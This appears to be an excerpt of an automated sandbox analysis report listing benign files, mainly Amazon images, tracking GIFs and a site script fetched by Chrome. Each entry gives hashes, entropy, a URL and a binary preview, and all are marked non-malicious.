                                                                                                                                                                                                                                                                      SHA-512:9E2F8F391CA83B4DBD4170F91B30268F81D7F570E042699BD73135EA60BF3AE5AAA343F5BAE91430879DCF305914646499A6EF24C2E3CA604460585C3CCA7E31
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...^..........QQ.....gAMA......a.....sRGB.........PLTEGpL...........................................................................................I..C..............................................................3..........................2...........-...............................................2........2..*...........3..2.....2...........1..2..........................2w.............2...w........v.......2.....-.....2............w....2.....2w........w....2..2..2.....3...$$$.....2...........2......w....2...w..222..2........2............w.......2.........333..........g.......8...........?R ...v..***...333v..v..............v..................f..e....222...................n....v.....222.f..e.......222.e.....g..d.........3......w.."/?.f....333.............r....~..1=L[..s.....mu.......Q[h...[eqdmx;GT\|......tRNS........@..........'`..<.F.Q......c.pD...+..0.#3wJ.........m.^[...7_..V.....N.....s....fA...../...{..|N....j..l..-Mv&i.9#..~..$...6i...e9...D.y0xy/...zG..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 180x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):13838
                                                                                                                                                                                                                                                                      Entropy (8bit):7.974316029208808
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:2SGwQAsAs6Skq1mI0KkgeECdbroJ9xFO0siCLER4zEsyjw3Xgd/7ITPpyG/zb2MS:ds7rkamIVeEKkdU/PzEsyYgdgTRxA
                                                                                                                                                                                                                                                                      MD5:6AAF5E10CFA592DF24715477CCD1A58D
                                                                                                                                                                                                                                                                      SHA1:BA746FFCB4292B10F7FE0179BBD31289259D8835
                                                                                                                                                                                                                                                                      SHA-256:A1271E50D554AACF249BF37636CE4365226DD11F938FCBD0E1CFCB2DECDFEE2A
                                                                                                                                                                                                                                                                      SHA-512:EBE4E5AAC875961119AD82323B8A25F97077D2DD84BDB5468319667F55EA5D3BCDB9A9358BBBCE2685568C5AB8C88A6914417154CCD5F0A33BC9BFA96762E6A2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/91+aaxyLapL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".............................................................!.1.."A.Qa.#2Bq....$3CRr..S...........%4DETst..................................................!1...AQa"q..2...#B...$4Rb...............?..---t..N.o.z,.E!..|H......J..e...C..H.........."B..jD%5.V@L...:4.J.........;..vn...:.].<"YC].......B._.V..*...X.)R.#%....ew....R=4.1..vu..-..f.bC..z2..PT0.+k]5.6..O...Dk.....<g...&....U_.?4.....=WZ...z.G&...,U6.b_...X...{.........$C.X...G/.*<i.._\23...5.(X.T.....W.......T...'...F*U.TQ#oQ.E...z{..X..x.V....,P.....iy .$..h....r......u.1.Z.z.].....q>....u...'x$.T~..$...U[w.....v}..m$.F.D$.....l..p..Z...g.r.....".pHV./..S..J.y7..y.?.g%.Lg.{<f5_..e.OsUz..52..gQ.....e...2.f!....*....F.8.a".`9U.j...Yj..........`.....L....vy-vj..`..F.......i.S.....K.........H.3.[.]1|..00-.....|.....l9.E.......f.,.s
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:SX0TR1HXR3TVBG1JQK3B$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295396.0%26id%3DSX0TR1HXR3TVBG1JQK3B%26m%3D1%26sc%3Dcsa%3Avl50%26vl50%3D1475%26pc%3D12399%26at%3D12399%26t%3D1724264979239%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D11601212031%26tid%3DSX0TR1HXR3TVBG1JQK3B%26aftb%3D1%26lob%3D1:12399
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 250x250, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):11151
                                                                                                                                                                                                                                                                      Entropy (8bit):7.951461352190833
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:LHOLccLBNDYp/4SrEoClrvb773lbvjApdKGVcdYWsHjwmw9Xe3JnrIG3Op:L2v9NDJSrEo8bXlhGViH8jtQXwJSp
                                                                                                                                                                                                                                                                      MD5:B0CE11E3D5478F98B3A501B643887521
                                                                                                                                                                                                                                                                      SHA1:FD898A107F490CBAD0162E340A5E5C4BDD1A7FDD
                                                                                                                                                                                                                                                                      SHA-256:3A2A3FD1ECFE647009EE27AB6E744F20C7CCF542EA1AC5648571077F942BBF8A
                                                                                                                                                                                                                                                                      SHA-512:01B833D539F5C75D85A36C3992486364DE53CC5F7C68AE0E406776AD467FF0A1CA22956FCC4B7AB7FB7DBB0C1F8D764A7C144D4A3A816004A2D6588F32ABDB39
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF.........................!.....+....'...'.''.#'##,'!!',#');)0+5,)8););::=BC;'BZ..........!8'.,:0.)E:C,:=::+L:C8:#;:,55,,0)0:,==;.+=8'Q+,':8B5'=H..........."..............................................................!1A.."Qaq..2B...Rr...#C...Sb..$3Ts...4.................................................!1.."AqQ.23.a..#B.............?..n...9.u...-c..`.lk....s.g5...N....G.Sw3*N.;D......f.G........K..8Fu%....S..o.btKw.....-...0..l?.8R..*...hx..S.[....$....wpb...r#E.mA.rT.8...X../.._........]..V4....c......S........+....ZM.*<o.t.....Zw_..SY...2m3/...~FkL......71Y.1.......V*.D\..7.X..&.&...Z...q./.X>....LDV..q{r..dW?+.....~.q...3.u.O... ..bi..f..*R&H5.Q....=.$....%A...+.R....(.)J.JR.R....(.)J.JR.R..+...{7*..\..*&..#......?.5..$...]~...o..Wj...{../..$..&.|....IS..yd[..vl`d...<.i_..........#....2o.R..K.L/'...U.l.r.|'..+Z.j..f.d..S...$.Os...cZ.K.v0..pJ...wG...V.DD5g.>.0q...X..b~.V..VB.....=.....{S...;.......+W.JI>.3.kPmvvm.F..x..`...Gx.L.q....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):65568
                                                                                                                                                                                                                                                                      Entropy (8bit):7.972734414417205
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:vOVvtP7gAcRAbg1KLE/1KFA/YlRe5MaqdonYTqdGNvuyb:vMFP7SRAs1KAYl45MKnYewNvuu
                                                                                                                                                                                                                                                                      MD5:7EEDD01A919D7135E14C607DF9F34A8F
                                                                                                                                                                                                                                                                      SHA1:D0883DE70E0B06479036934BA9CE23AC870C4900
                                                                                                                                                                                                                                                                      SHA-256:CE5801AD5AC28CC87F73784BBA9E6AAE819FB432F15F5C919735453D550B9A11
                                                                                                                                                                                                                                                                      SHA-512:962605CB9BA7458BE8E0D719CB57C865BFD72548F6BB5DC98A5DACEF1F8F46E4D6E86F0101D6E949F18276075BC02D4AD805E8CC373585BC663C9986AAC08FAD
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................................;.................................................................................X..........F.x.n[.........y..+/.....&.[?0....m................=..,{..u.(.vE....../{.ylf...C.w.u.^_. ..........F>.3..l..c.p.ws........"[..s.4..'.H............6.vh.......:........(...N.k|..,/...........V?..w6v.P`...........6.v.s.....d...........n.sck8.Z...........)5A<zO.r.f. ......C................0..;=..4~K.sKz.=..........mp... .....,...D.#.......T.b..&e.l..C....n.J!..}f.6GK.....GS.V.....?.._.z......Z..l...w5.i..Z@.... h..C.............g%+w;A.....mk.......#x...B.;=.......,w....G...'.:.y.......-r.......GmY.P..{g........./.?.'..0....]0;....]..k>|.}.Z.........*hs...:..........N.9..N.<}.U..w........H.......4.+#.{...V.....~.w.;..v....:M.?.......$...............+wj.yEb....m.]f...7.jY..;Q<y.. ..%h...C.d.L....}+;.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:PNG image data, 136 x 104, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):5861
                                                                                                                                                                                                                                                                      Entropy (8bit):7.941819196061047
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:s5LS1YmLYIid4UFrn782yy57rQflsr4971/SauFVE26HrKYz0L/aw8oBXMZc1gXx:UEYYYIidFR78MnQ9C4971Sx/6HGYz+/6
                                                                                                                                                                                                                                                                      MD5:661F95800A801676A279D066C3C8114E
                                                                                                                                                                                                                                                                      SHA1:C495A9B59AFD9B35A08C12513D40B8C7E7771499
                                                                                                                                                                                                                                                                      SHA-256:849C8F9A22736A09D7C0C7981842D932777B5A0056CBA7DF41997C49D536225D
                                                                                                                                                                                                                                                                      SHA-512:A42EC4D0051537ED8B7BD27150E4FEA8F688C3B5FF6FAB2EF03B64492DE8033517AE019F72855102BE5F4405E537A5600F987331B2B2D30F81F37FEB251FFB03
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/S/sash/ydDD9hnRfziI$y7.png
                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR.......h.....*.......gAMA......a....:iCCPPhotoshop ICC profile..H...wTT....wz..0.)C.. .7..Da..`(..34.!...ED..A."..."."...`... ..`.QQy3.Vt.....g}k...=g.}.......tX..4.....J....c........`.23.B=.H>.n.L..."..7w.+.7....t..I...........d..P....}F....1.(1.E..........";....c.X|..v.[.=".%....qQ...-.[".L..qE.V...af.."....+I."&..B.D....).+........Rn...|nb........2...T.@`..d.0.l.[zZ......?KF\[....f...F..f_..n.M.{.H..?....}..._z=..YQmv|.....c3.....4.. ).[..W....%I .31...6.rX.......7.......(..........S.|zf.....y..q._..0....sx..p.qy..v..\.7.G...S..a..8."Q.>.j.1......>.....s@....7.|8.......,...e.%...9.-$............H.*P.*@...#`.l.=p......0..V..H.i...A>...@...v.jP..@.h.'@.8.....:..n..`....`......a!2D.. UH.2..!...y@.P....A....B..&..*...:....:.]..B..=h...~....L...2............p"......p.\.......u.6<.?.g........!....D......C..J..iA..^.&2.L#.P...EG...Q..(.j5j...U.:.jG..n.FQ3.Oh2Z.m..C..#..lt....nC_B.F...`0..F.c...Da.1k0....V.y. f.3..b...X.l ...`..{...C.q.[..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                                                                                      MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                                                                                      SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                                                                      SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                                                                      SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):3600
                                                                                                                                                                                                                                                                      Entropy (8bit):7.890786194679337
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TubK6gqdSQ7cy2Ki/jIgoQ+WWyUCRsTl7uQB:qe6gqB2Zr3Wy6xu0
                                                                                                                                                                                                                                                                      MD5:730F9BF453F6D8D9E549D29D91504768
                                                                                                                                                                                                                                                                      SHA1:481BCCF46BFEF31227ACE73953960A2177B202CF
                                                                                                                                                                                                                                                                      SHA-256:0B7D12BF279A942F5D966963A04549BA48DB2FE3A3F59FDF68CFD9C3D594A2F1
                                                                                                                                                                                                                                                                      SHA-512:28CD7576E35324C1C37CEAE2EF42A1ED55D26A2366DC097A18C99C901B7CE15DDE7A9B5B628FFFC5608E99EE69C1A6D21B3FECFBBCDE8756BA936DEA9A9B2CBF
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".................................................................!.1Aaq"2Q....BTr.......4RUb....#$D...Cc....................................................!1..2AR.."BQ.CSqab...............?...QE.QE..E.P..Q@.QE.QE..E.P..Q@.QE.T...q.i.......Q:.^....5>.w....5=ST...1......QS*..ec...F...56..1.S..%.nR.zH...\..(=$.....J..m....m.... S...s........)N.........0KG...A#x!..<....5l....T....~...'_.`.)[.zD...M...PSB.....20.......c.....u..E..y.|..}u....i\M.^....'.L........D%.^7.lw..6...'.G.3h.\}.{..0Q...k........!..L./..d..f:E...|}.~.37..t.w...8...1..$k..x.(...H.B...e..L..;.nE)./.N.C..Z.u$>.o..k..i....^.of..3.;...@j....=^...5ti.z...M....1h..E\0d.....=...6~E/.J....B1..V..Z}Y..2....U...L....CK...'Rp..S*...9......0..[TW.+...Y..-...W(AJx....\..G......r.(.......*s...D.a....;.v..(,..`..K.&.&.t.|R.0.X........F)
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):15356
                                                                                                                                                                                                                                                                      Entropy (8bit):7.909313052275716
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:fC1lfHpvT48gkLwV9niXjm5aunLVgDXx0HSkVlTpMcqosM5NNGtO4:f2xL4+LuxneqdlTpPVNW1
                                                                                                                                                                                                                                                                      MD5:6EE628CAD41FEF810090E5DD3061E2AE
                                                                                                                                                                                                                                                                      SHA1:15D60E4F885EF80BD4BFAA9C90A19A33F045F1E5
                                                                                                                                                                                                                                                                      SHA-256:8ECA8EEAE940607A8137EEFFB06FE0B3E66AC2C66FB7F7ED865E490EFEA554E8
                                                                                                                                                                                                                                                                      SHA-512:8352D5D990ECEA9434532408FDD642B2A5C23DF52007641F767082A4C8DC40B186F625614C4EF7CCC5C6742184983298EC99CE1EA244EFF48E88E3159B0CB0F8
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5.............................................................................................................................................................vz;.q'X9...w....3...v..W..3............]!.F?*.}K...d.7...^'....w...W[....E..9..-. .............W...D.~..]t..nr....x-.q.t.{._M..........;.b..}.+`.2....j..5I!*.]...c.#.8_.../u............E._K~YS^..ku.}.)V.}(.0..&ia.iH.`".(..&#T#.gZ..u.......H.Z..........h.............y...~..}.y&.;.KR...I..J.I.,H...FQ..DO.]..1.x.[...<..;&R)..y........u..s....F.^..~`.........5......?[......~.~.*.i..*.....X.a2!..2.mu.|6[.,.g...nR.q.'..T5...<..n.t..=U.}.K.....}9.n...F..........q..v7.....-'=.}n._\....m.kTV.K.B.e..R....}.}..J..3..G.|.....tq.....1..]t...W..5.nl.C].i....l.w...*.y ..........V.V.....>.q..#.W._hyl:7....z.#!>.j....<...O..l...5.^.-...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (596)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):145592
                                                                                                                                                                                                                                                                      Entropy (8bit):5.473202146029003
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:F2Pnv3DHGitB/3hznNbfd6OhjXT4/6zrdB:WnxfFV3rP
                                                                                                                                                                                                                                                                      MD5:E6AD7C0C1D758C62AE17AD09350846A7
                                                                                                                                                                                                                                                                      SHA1:F6DB6B79C1AA8F3D948AC71AA67C03E15803B2C3
                                                                                                                                                                                                                                                                      SHA-256:9C325CB41BAE7C9020F583FA732239F25371514F267131A80F14B9A3BB774B60
                                                                                                                                                                                                                                                                      SHA-512:55DA9C15DCB796DAFA010DE28F4372D325184AD5CC2981F91EB78C6CF1CA789D5590BD3373802212D868267A337007744B3B831685F1531F94960BA0961FBAE3
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://images-eu.ssl-images-amazon.com/images/I/11XMgK3X1EL._RC%7C31PLWBroQRL.js,31Y5AkqmNvL.js,01WtpFkF58L.js,313k3X0MlqL.js,41STYmgYJcL.js,41E7GR6uegL.js,01r1r3sVlxL.js,21A1FsWcl5L.js,019dBqWurRL.js,11begzhl8OL.js,011VrMJVPzL.js,01XQQDMWkKL.js,012z3lMdhOL.js,11Exu1nsH7L.js,01b82LFIRTL.js,11UyW+59ZyL.js,015CwW0puPL.js,21UoUtkStoL.js,0164lSJukTL.js,219jZMsEOWL.js,01X+UeeJIKL.js,31ydWb2R4oL.js,01FA0ZefFJL.js,41sLQbGE0jL.js_.js?AUIClients/SearchAssets&4qcBlqbu"
                                                                                                                                                                                                                                                                      Preview:(function(e){var f=window.AmazonUIPageJS||window.P,k=f._namespace||f.attributeErrors,c=k?k("SearchAssets@actions",""):f;c.guardFatal?c.guardFatal(e)(c,window):c.execute(function(){e(c,window)})})(function(e,f,k){e.declare("s-actions",{SUB_RESOURCE_ITEM_READY:"s-web-application-controller:subResourceItemReady",DEBUG_VIEWS_ATF:"s-web-application-controller:debugViewsAtf",DEFERRED_CONTENT_READY:"s-web-application-controller:deferredContentReady",FILTERS_LINK_VIEW_READY:"s-web-application-controller:filtersLinkViewReady",.FILTERS_PANEL_VIEW_COMPLETE:"s-web-application-controller:filtersPanelViewComplete",FILTERS_PANEL_VIEW_READY:"s-web-application-controller:filtersPanelViewReady",LOAD_REFINEMENTS_COMPLETE:"s-web-application-controller:loadSearchRefinementsComplete",LOAD_SEARCH_PAGE:"s-web-application-controller:loadSearchResults",LOAD_SEARCH_PAGE_COMPLETE:"s-web-application-controller:loadSearchResultsComplete",LOAD_SEARCH_PAGE_STARTING:"s-web-application-controller:loadSearchPageStarting
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 262x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):11266
                                                                                                                                                                                                                                                                      Entropy (8bit):7.942883415492547
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:qpP00ltXLEuWkuaJ4WsMbG78ve31d8PF/XUSFw5ZhwsMiysSAoOyXNSXGPIVSI:K/KibsMK7ye3PylkUiysloO2N5I
                                                                                                                                                                                                                                                                      MD5:444EB1742C49217D48A4640CA83D58FF
                                                                                                                                                                                                                                                                      SHA1:8685426A07768DE2539303A2EBD44B50EF8A7920
                                                                                                                                                                                                                                                                      SHA-256:D4BFB1D6FE09911CA7A109916719AE253F4E6CEA8750D8657B4D1C88A0761A53
                                                                                                                                                                                                                                                                      SHA-512:E4DEE75758A168D281244D0DC72046CB08C2FBF8C7A888AE6C29AF5D3D99EF54AAFEEE5C6AD71E986645DE6AEBE9EC2435B984389961269CA047E4FCEB883BD3
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71NMAGNrkiL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5.........................................................................<.Z......--....r.%...............1.O...m...O..{Qw..qgi..d..P............^V73.#.,.o....S..>%..............E(=..e..E...weS<I...yuG1^..... ..........s......s....:.l.}..w.n..]n,........Or.cgb.A=X."~..Z.;...+.~~.~.........m2..]-...1.................G.B..jZ]].oc.N...........kG....C..i..}.1yd.>..m.\./..(@=&x..g.m..3.m...^..1....z__....>{<.._..m[............Wz...../...e2.S..].R....z....|.K.....5t:.g~....|.;.....\....._..|.-@;;.:^~.........~.b...c...;X.L..wq..6.Q[...'I=.w.C).Gj]-.L+..ks...+..-..C.l..-.M...l.:..z6>....J....*l?\.U...V.....]GWa......~.'....~gg....,./o4.....8...g.%....:......]..&0...V....U)..(L....H..i....).xQ.6...k.f.....eH.......FR......G.....i.....m.._9..T...gP)T..........v..;U.5....M_..9.Za
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):4956
                                                                                                                                                                                                                                                                      Entropy (8bit):7.80136775427975
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TzZ7l7SLhalSVYwS/3mflIrYdDkQsdLFVtRy0SI1V8ZRbUfNdH:p78LkIVYwS/3mdFDkQsVzygVQRbUfNdH
                                                                                                                                                                                                                                                                      MD5:221B361F3870A3260226B289ADF353E2
                                                                                                                                                                                                                                                                      SHA1:73F3B7C97FDB69DEB63D0DD10196F11028737870
                                                                                                                                                                                                                                                                      SHA-256:84D6710CDF9D1A9BC5D66215A790AD53008DAE793200327B91B816DD0B6EAA66
                                                                                                                                                                                                                                                                      SHA-512:FE937DD80F435B5C50861B07BE246FBCA22790DC0CAA05917879AA66BE78F2717851C7E7063DE8A2A64E8F242E159D9F6DFB25352EB6F1D37626E36FFB14D350
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/I/31zyL4SK5OL._SR240,220_.jpg"
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5......................................................................................................0.B.....d........>.....k.#d<kl#d.....Z..gNjn..........gS..].Y....[3..#..!.H.e(X.bW.;B<.(4...8s..,w.qZ..i..C6..............Y..9.S.....f..}1Q..M.M.'&jS2.....b.]/;&...#..o......9..~~tG....V<yX....>cx.M....&suVr.=..?M..R...'.Kf...6....\.&........"x........1.V-.rbF6.R...n.T.....4.}.......d..T......h.......D9.y.syO..(...c;{gp...1..Fn.^.=.uW...P.....r.a.q.:...P7.>|.&.........z./Z....%}.N=.z{.(.J...$...M..D..[.{...#G....`^.k.8.b..x...0..;...|n.-nN.u`r......i...&...(.(<..Zr..WUr...0........................................,...........................4...!0."1A #2p@............:3h....o..............@.@.B.B.D.F.F...*F..@.Z{yS..c...dO..........V......].......2ZV..\.\..Y.(.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):2126
                                                                                                                                                                                                                                                                      Entropy (8bit):7.727551160854069
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:TT0rVDab2r5IGczX/BUktX8SzVwLc1qYgY6ssCecQOdj:Tyab2raXzZU2dBecxqbcQs
                                                                                                                                                                                                                                                                      MD5:39D4307D1E3F7E1011831A12EAF630CF
                                                                                                                                                                                                                                                                      SHA1:4C5D059985B30F4D92BE536FE827499D0B7C0455
                                                                                                                                                                                                                                                                      SHA-256:75CBE731B4F76EC56A97BF842AD9961D459408B7A820BC2B08C36C5C1DCFBD7A
                                                                                                                                                                                                                                                                      SHA-512:AFF0E1FB6804FECFBBE6BDFEDD8FB6823737445558A1ABA8E357610FEF017714278DCCAE93D77C6E9BA12322F3BA5C5CF212A7E03A5C3FC92D066486305C7AFF
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..........z.....................................................!1Aa.."Q..2q.r........$BRb.....................................................?....................f...]+........f.+.................WEc...Y.bw].P7...w&1..x(....s.{.u.....N.D:7P7.:..nl>.(#..c..1..^.........^i.eL.&*,...6E(x.X..cO......$.....k..w...Zj.un...i.w....=f8....e....w...-.,>.%..{...s..I.I<I]..rWHyt..j....f...r.^...m:.8o0:....k. K%L..L.7.o}......q.b..T..(..""." *..... (...Y.nfIe..d,..:<.......g..JA=.rI..E.(|L....@p.bt........Ap.4>#p_..._..I.O.C..j..o..uj[<.5.G.4w:. k.q+X,x."^.]...........c..[.....wW{8y...U...#..A(3L$..?....5.3..G..i.1.<...Ylq.gQ.B..<..3N..|.......O..N........^.=0G.G.......jO.."".....v..!....Q.]#....^=.%.*`..Eh.$...Mv.X._.....R..f.....jwD?.1.{.&5....o.q{'.w...%..v.7k....N.vY.P..z;........kF.2Tq.W..O...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):15852
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9236259113225005
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:wmfrIaqzvm0LyJucnuk3SebiGwIOzJwsz2FJD4WH:wmUaqzvfmfukqfIUOY2n/
                                                                                                                                                                                                                                                                      MD5:ED1E468B715935CD8160F255366831D9
                                                                                                                                                                                                                                                                      SHA1:A6931BA0792B0D50A49B3167CB6E72AA4C0F82A1
                                                                                                                                                                                                                                                                      SHA-256:5AEC7DF5440E09B82B02DC3D78243C3BCF0806EC722B963CA72C83E7DEB0C417
                                                                                                                                                                                                                                                                      SHA-512:4E1D0C66431D44CFAE36503AAA0E7F11BE1CE78B0441B0BAEA7DBCE16EF6BA06926AD70D33770607B51E77FB3EEA5857802C1006F5172EE6F2F9C2B8823A1943
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/I/41YtSb5uAGL._SR480,440_.jpg"
